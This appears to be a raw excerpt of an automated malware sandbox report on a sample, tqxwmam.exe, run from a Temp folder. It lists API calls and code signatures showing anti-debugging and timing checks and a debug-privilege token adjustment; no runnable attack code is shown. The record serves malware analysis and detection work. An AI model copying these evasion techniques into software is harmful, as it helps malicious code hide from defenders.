          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_00402EC3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00402EC3
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_004039C5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_004039C5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_00401204 GetWindowTextLengthW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetWindowTextW,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,WideCharToMultiByte,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,WideCharToMultiByte,GetProcessHeap,HeapFree,CreateFileW,GetProcessHeap,HeapFree,WriteFile,CloseHandle,SetEndOfFile,CloseHandle,GetProcessHeap,HeapFree,SendMessageW,1_2_00401204
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB6A60 rdtscp 2_2_00AB6A60
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC90AF mov eax, dword ptr fs:[00000030h]2_2_00AC90AF
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB20A0 mov eax, dword ptr fs:[00000030h]2_2_00AB20A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB20A0 mov eax, dword ptr fs:[00000030h]2_2_00AB20A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB20A0 mov eax, dword ptr fs:[00000030h]2_2_00AB20A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB20A0 mov eax, dword ptr fs:[00000030h]2_2_00AB20A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB20A0 mov eax, dword ptr fs:[00000030h]2_2_00AB20A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB20A0 mov eax, dword ptr fs:[00000030h]2_2_00AB20A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABF0BF mov ecx, dword ptr fs:[00000030h]2_2_00ABF0BF
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABF0BF mov eax, dword ptr fs:[00000030h]2_2_00ABF0BF
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABF0BF mov eax, dword ptr fs:[00000030h]2_2_00ABF0BF
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A89080 mov eax, dword ptr fs:[00000030h]2_2_00A89080
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B03884 mov eax, dword ptr fs:[00000030h]2_2_00B03884
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B03884 mov eax, dword ptr fs:[00000030h]2_2_00B03884
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A858EC mov eax, dword ptr fs:[00000030h]2_2_00A858EC
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B1B8D0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00B1B8D0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B1B8D0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B1B8D0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B1B8D0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B1B8D0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9B02A mov eax, dword ptr fs:[00000030h]2_2_00A9B02A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9B02A mov eax, dword ptr fs:[00000030h]2_2_00A9B02A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9B02A mov eax, dword ptr fs:[00000030h]2_2_00A9B02A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9B02A mov eax, dword ptr fs:[00000030h]2_2_00A9B02A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB002D mov eax, dword ptr fs:[00000030h]2_2_00AB002D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB002D mov eax, dword ptr fs:[00000030h]2_2_00AB002D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB002D mov eax, dword ptr fs:[00000030h]2_2_00AB002D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB002D mov eax, dword ptr fs:[00000030h]2_2_00AB002D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB002D mov eax, dword ptr fs:[00000030h]2_2_00AB002D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B54015 mov eax, dword ptr fs:[00000030h]2_2_00B54015
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B54015 mov eax, dword ptr fs:[00000030h]2_2_00B54015
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B07016 mov eax, dword ptr fs:[00000030h]2_2_00B07016
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B07016 mov eax, dword ptr fs:[00000030h]2_2_00B07016
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B07016 mov eax, dword ptr fs:[00000030h]2_2_00B07016
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B51074 mov eax, dword ptr fs:[00000030h]2_2_00B51074
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B42073 mov eax, dword ptr fs:[00000030h]2_2_00B42073
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA0050 mov eax, dword ptr fs:[00000030h]2_2_00AA0050
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA0050 mov eax, dword ptr fs:[00000030h]2_2_00AA0050
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB61A0 mov eax, dword ptr fs:[00000030h]2_2_00AB61A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB61A0 mov eax, dword ptr fs:[00000030h]2_2_00AB61A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B051BE mov eax, dword ptr fs:[00000030h]2_2_00B051BE
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B051BE mov eax, dword ptr fs:[00000030h]2_2_00B051BE
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B051BE mov eax, dword ptr fs:[00000030h]2_2_00B051BE
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B051BE mov eax, dword ptr fs:[00000030h]2_2_00B051BE
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B069A6 mov eax, dword ptr fs:[00000030h]2_2_00B069A6
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAC182 mov eax, dword ptr fs:[00000030h]2_2_00AAC182
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABA185 mov eax, dword ptr fs:[00000030h]2_2_00ABA185
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB2990 mov eax, dword ptr fs:[00000030h]2_2_00AB2990
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8B1E1 mov eax, dword ptr fs:[00000030h]2_2_00A8B1E1
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8B1E1 mov eax, dword ptr fs:[00000030h]2_2_00A8B1E1
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8B1E1 mov eax, dword ptr fs:[00000030h]2_2_00A8B1E1
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B141E8 mov eax, dword ptr fs:[00000030h]2_2_00B141E8
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA4120 mov eax, dword ptr fs:[00000030h]2_2_00AA4120
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA4120 mov eax, dword ptr fs:[00000030h]2_2_00AA4120
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA4120 mov eax, dword ptr fs:[00000030h]2_2_00AA4120
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA4120 mov eax, dword ptr fs:[00000030h]2_2_00AA4120
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA4120 mov ecx, dword ptr fs:[00000030h]2_2_00AA4120
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB513A mov eax, dword ptr fs:[00000030h]2_2_00AB513A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB513A mov eax, dword ptr fs:[00000030h]2_2_00AB513A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A89100 mov eax, dword ptr fs:[00000030h]2_2_00A89100
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A89100 mov eax, dword ptr fs:[00000030h]2_2_00A89100
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A89100 mov eax, dword ptr fs:[00000030h]2_2_00A89100
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8C962 mov eax, dword ptr fs:[00000030h]2_2_00A8C962
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8B171 mov eax, dword ptr fs:[00000030h]2_2_00A8B171
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8B171 mov eax, dword ptr fs:[00000030h]2_2_00A8B171
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAB944 mov eax, dword ptr fs:[00000030h]2_2_00AAB944
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAB944 mov eax, dword ptr fs:[00000030h]2_2_00AAB944
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A852A5 mov eax, dword ptr fs:[00000030h]2_2_00A852A5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A852A5 mov eax, dword ptr fs:[00000030h]2_2_00A852A5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A852A5 mov eax, dword ptr fs:[00000030h]2_2_00A852A5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A852A5 mov eax, dword ptr fs:[00000030h]2_2_00A852A5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A852A5 mov eax, dword ptr fs:[00000030h]2_2_00A852A5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9AAB0 mov eax, dword ptr fs:[00000030h]2_2_00A9AAB0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9AAB0 mov eax, dword ptr fs:[00000030h]2_2_00A9AAB0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABFAB0 mov eax, dword ptr fs:[00000030h]2_2_00ABFAB0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABD294 mov eax, dword ptr fs:[00000030h]2_2_00ABD294
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABD294 mov eax, dword ptr fs:[00000030h]2_2_00ABD294
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB2AE4 mov eax, dword ptr fs:[00000030h]2_2_00AB2AE4
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB2ACB mov eax, dword ptr fs:[00000030h]2_2_00AB2ACB
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC4A2C mov eax, dword ptr fs:[00000030h]2_2_00AC4A2C
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC4A2C mov eax, dword ptr fs:[00000030h]2_2_00AC4A2C
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A98A0A mov eax, dword ptr fs:[00000030h]2_2_00A98A0A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA3A1C mov eax, dword ptr fs:[00000030h]2_2_00AA3A1C
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A85210 mov eax, dword ptr fs:[00000030h]2_2_00A85210
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A85210 mov ecx, dword ptr fs:[00000030h]2_2_00A85210
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A85210 mov eax, dword ptr fs:[00000030h]2_2_00A85210
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A85210 mov eax, dword ptr fs:[00000030h]2_2_00A85210
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]2_2_00A8AA16
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]2_2_00A8AA16
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B3B260 mov eax, dword ptr fs:[00000030h]2_2_00B3B260
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B3B260 mov eax, dword ptr fs:[00000030h]2_2_00B3B260
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC927A mov eax, dword ptr fs:[00000030h]2_2_00AC927A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B58A62 mov eax, dword ptr fs:[00000030h]2_2_00B58A62
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B14257 mov eax, dword ptr fs:[00000030h]2_2_00B14257
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A89240 mov eax, dword ptr fs:[00000030h]2_2_00A89240
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A89240 mov eax, dword ptr fs:[00000030h]2_2_00A89240
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A89240 mov eax, dword ptr fs:[00000030h]2_2_00A89240
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A89240 mov eax, dword ptr fs:[00000030h]2_2_00A89240
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB4BAD mov eax, dword ptr fs:[00000030h]2_2_00AB4BAD
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB4BAD mov eax, dword ptr fs:[00000030h]2_2_00AB4BAD
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB4BAD mov eax, dword ptr fs:[00000030h]2_2_00AB4BAD
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B55BA5 mov eax, dword ptr fs:[00000030h]2_2_00B55BA5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A91B8F mov eax, dword ptr fs:[00000030h]2_2_00A91B8F
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A91B8F mov eax, dword ptr fs:[00000030h]2_2_00A91B8F
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B3D380 mov ecx, dword ptr fs:[00000030h]2_2_00B3D380
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABB390 mov eax, dword ptr fs:[00000030h]2_2_00ABB390
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB2397 mov eax, dword ptr fs:[00000030h]2_2_00AB2397
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B4138A mov eax, dword ptr fs:[00000030h]2_2_00B4138A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AADBE9 mov eax, dword ptr fs:[00000030h]2_2_00AADBE9
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB03E2 mov eax, dword ptr fs:[00000030h]2_2_00AB03E2
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB03E2 mov eax, dword ptr fs:[00000030h]2_2_00AB03E2
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB03E2 mov eax, dword ptr fs:[00000030h]2_2_00AB03E2
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB03E2 mov eax, dword ptr fs:[00000030h]2_2_00AB03E2
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB03E2 mov eax, dword ptr fs:[00000030h]2_2_00AB03E2
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB03E2 mov eax, dword ptr fs:[00000030h]2_2_00AB03E2
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B053CA mov eax, dword ptr fs:[00000030h]2_2_00B053CA
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B053CA mov eax, dword ptr fs:[00000030h]2_2_00B053CA
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B4131B mov eax, dword ptr fs:[00000030h]2_2_00B4131B
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8DB60 mov ecx, dword ptr fs:[00000030h]2_2_00A8DB60
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB3B7A mov eax, dword ptr fs:[00000030h]2_2_00AB3B7A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB3B7A mov eax, dword ptr fs:[00000030h]2_2_00AB3B7A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8DB40 mov eax, dword ptr fs:[00000030h]2_2_00A8DB40
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B58B58 mov eax, dword ptr fs:[00000030h]2_2_00B58B58
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8F358 mov eax, dword ptr fs:[00000030h]2_2_00A8F358
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9849B mov eax, dword ptr fs:[00000030h]2_2_00A9849B
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06CF0 mov eax, dword ptr fs:[00000030h]2_2_00B06CF0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06CF0 mov eax, dword ptr fs:[00000030h]2_2_00B06CF0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06CF0 mov eax, dword ptr fs:[00000030h]2_2_00B06CF0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B414FB mov eax, dword ptr fs:[00000030h]2_2_00B414FB
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B58CD6 mov eax, dword ptr fs:[00000030h]2_2_00B58CD6
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABBC2C mov eax, dword ptr fs:[00000030h]2_2_00ABBC2C
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41C06 mov eax, dword ptr fs:[00000030h]2_2_00B41C06
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B5740D mov eax, dword ptr fs:[00000030h]2_2_00B5740D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B5740D mov eax, dword ptr fs:[00000030h]2_2_00B5740D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B5740D mov eax, dword ptr fs:[00000030h]2_2_00B5740D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06C0A mov eax, dword ptr fs:[00000030h]2_2_00B06C0A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06C0A mov eax, dword ptr fs:[00000030h]2_2_00B06C0A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06C0A mov eax, dword ptr fs:[00000030h]2_2_00B06C0A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06C0A mov eax, dword ptr fs:[00000030h]2_2_00B06C0A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA746D mov eax, dword ptr fs:[00000030h]2_2_00AA746D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABA44B mov eax, dword ptr fs:[00000030h]2_2_00ABA44B
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1C450 mov eax, dword ptr fs:[00000030h]2_2_00B1C450
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1C450 mov eax, dword ptr fs:[00000030h]2_2_00B1C450
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB35A1 mov eax, dword ptr fs:[00000030h]2_2_00AB35A1
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B505AC mov eax, dword ptr fs:[00000030h]2_2_00B505AC
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B505AC mov eax, dword ptr fs:[00000030h]2_2_00B505AC
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB1DB5 mov eax, dword ptr fs:[00000030h]2_2_00AB1DB5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB1DB5 mov eax, dword ptr fs:[00000030h]2_2_00AB1DB5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB1DB5 mov eax, dword ptr fs:[00000030h]2_2_00AB1DB5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A82D8A mov eax, dword ptr fs:[00000030h]2_2_00A82D8A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A82D8A mov eax, dword ptr fs:[00000030h]2_2_00A82D8A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A82D8A mov eax, dword ptr fs:[00000030h]2_2_00A82D8A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A82D8A mov eax, dword ptr fs:[00000030h]2_2_00A82D8A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A82D8A mov eax, dword ptr fs:[00000030h]2_2_00A82D8A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB2581 mov eax, dword ptr fs:[00000030h]2_2_00AB2581
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB2581 mov eax, dword ptr fs:[00000030h]2_2_00AB2581
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB2581 mov eax, dword ptr fs:[00000030h]2_2_00AB2581
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB2581 mov eax, dword ptr fs:[00000030h]2_2_00AB2581
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABFD9B mov eax, dword ptr fs:[00000030h]2_2_00ABFD9B
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABFD9B mov eax, dword ptr fs:[00000030h]2_2_00ABFD9B
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B38DF1 mov eax, dword ptr fs:[00000030h]2_2_00B38DF1
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9D5E0 mov eax, dword ptr fs:[00000030h]2_2_00A9D5E0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9D5E0 mov eax, dword ptr fs:[00000030h]2_2_00A9D5E0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06DC9 mov eax, dword ptr fs:[00000030h]2_2_00B06DC9
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06DC9 mov eax, dword ptr fs:[00000030h]2_2_00B06DC9
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06DC9 mov eax, dword ptr fs:[00000030h]2_2_00B06DC9
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06DC9 mov ecx, dword ptr fs:[00000030h]2_2_00B06DC9
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06DC9 mov eax, dword ptr fs:[00000030h]2_2_00B06DC9
